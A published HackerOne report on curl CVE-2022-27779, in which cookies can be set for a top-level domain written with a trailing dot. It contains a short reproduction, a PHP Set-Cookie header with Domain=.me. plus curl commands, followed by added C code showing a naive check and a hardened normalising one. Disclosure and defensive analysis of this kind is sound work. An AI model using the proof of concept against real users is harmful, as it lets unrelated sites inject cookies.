HackerOne report H1:1553301, reporter haxatron1 (hackerone.com), published Apr 28, 2022, 08:30

curl: CVE-2022-27779: cookie for trailing dot TLD

CVSS3: 5.3 Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
  Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: LOW; Integrity Impact: NONE; Availability Impact: NONE

CVSS2: 5 Medium (AV:N/AC:L/Au:N/C:N/I:P/A:N)
  Access Vector: NETWORK; Access Complexity: LOW; Authentication: NONE; Confidentiality Impact: NONE; Integrity Impact: PARTIAL; Availability Impact: NONE

EPSS: 0.005 Low (Percentile 74.8%)

Summary:

In CVE-2014-3620 curl prevents cookies from being set for Top Level Domains (TLDs). According to the advisory, curl’s “cookie parser has no Public Suffix awareness”, but it will “reject TLDs from being allowed”. However, a cookie can still be set for a TLD + trailing dot.

A trailing dot after a TLD is considered legal in a host name, and curl will send a request for http://example.com. to http://example.com.

Steps To Reproduce:

  1. Create a PHP file served by Apache like the following (index.php):

     <?php
     // The cookie Domain is the TLD ".me" written with a trailing dot
     header("Set-Cookie: a=b; Domain=.me.");

  2. Now save the cookie to curl and see the cookie is set for .me.

     curl -c cookies.txt http://localtest.me./index.php

     cookies.txt:

     # Netscape HTTP Cookie File
     # https://curl.se/docs/http-cookies.html
     # This file was generated by libcurl! Edit at your own risk.

     .me.    TRUE    /       FALSE   0       a       b

  3. Requests sent via curl to any host written with the TLD plus a trailing ‘.’ will now contain that cookie.

     curl -b cookies.txt http://domain.me./index.php

     GET / HTTP/1.1
     Host: domain.me.
     User-Agent: curl/7.83.0
     Accept: */*
     Cookie: a=b

Impact

Cookies can be set by arbitrary sites for TLD + “.”, and if a trailing dot is used for an unrelated site, curl will send the cookie to the unrelated site.
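To show why the trailing dot defeats a TLD check that only looks for an interior dot, and how a cookie-domain check should canonicalise the name before deciding, here is an added C example. It is not curl's code: the function names, the naive check and the hardened check are my own construction written to mirror the behaviour the report describes. Like the curl cookie parser at the time, it has no Public Suffix awareness, so a multi-label public suffix such as co.uk would still be accepted as a cookie domain.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAXHOST 256

/* Copy a host or cookie-domain name into buf in canonical form: lowercase,
   leading dot removed (cookie Domain attributes often carry one) and a single
   trailing dot stripped, because "example.com." names the same host as
   "example.com". Returns false for empty or malformed input. */
static bool normalize_name(const char *in, char *buf, size_t buflen)
{
    size_t len;
    if (*in == '.')
        in++;
    len = strlen(in);
    if (len && in[len - 1] == '.')
        len--;                         /* drop the FQDN trailing dot */
    if (len == 0 || len >= buflen)
        return false;
    for (size_t i = 0; i < len; i++)
        buf[i] = (char)tolower((unsigned char)in[i]);
    buf[len] = '\0';
    if (buf[len - 1] == '.')           /* "example.com.." is malformed */
        return false;
    return true;
}

/* Naive check (constructed to mirror the report): a domain counts as a bare
   TLD only if it contains no dot after the leading one. ".me." slips through
   because "me." still contains a dot. Returns true when the cookie would be
   accepted for that domain. */
bool naive_tld_check_allows(const char *domain)
{
    if (*domain == '.')
        domain++;
    return strchr(domain, '.') != NULL;
}

/* Hardened check: canonicalise both names first, reject a domain that has no
   interior dot (a bare TLD), then require the domain to match the host on a
   label boundary. Returns true when the cookie may be set for `domain` by a
   response from `host`. */
bool cookie_domain_allowed(const char *host, const char *domain)
{
    char h[MAXHOST], d[MAXHOST];
    if (!normalize_name(host, h, sizeof h) || !normalize_name(domain, d, sizeof d))
        return false;
    if (strchr(d, '.') == NULL)        /* "me" after normalisation: a TLD */
        return false;
    size_t hl = strlen(h), dl = strlen(d);
    if (hl == dl)
        return strcmp(h, d) == 0;
    if (hl < dl)
        return false;
    /* host must end with ".<domain>", so "badexample.com" never matches "example.com" */
    return h[hl - dl - 1] == '.' && strcmp(h + hl - dl, d) == 0;
}

int main(void)
{
    printf("naive check, Domain=.me  : %s\n", naive_tld_check_allows(".me") ? "accepted" : "rejected");
    printf("naive check, Domain=.me. : %s\n", naive_tld_check_allows(".me.") ? "accepted" : "rejected");
    printf("hardened, localtest.me. / .me.          : %s\n",
           cookie_domain_allowed("localtest.me.", ".me.") ? "accepted" : "rejected");
    printf("hardened, localtest.me. / .localtest.me : %s\n",
           cookie_domain_allowed("localtest.me.", ".localtest.me") ? "accepted" : "rejected");
    return 0;
}
```

The point of the normalisation step is that the TLD test and the host match run on the same canonical string; a check that inspects the raw Domain attribute sees "me." and "me" as different names even though they resolve to the same zone.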
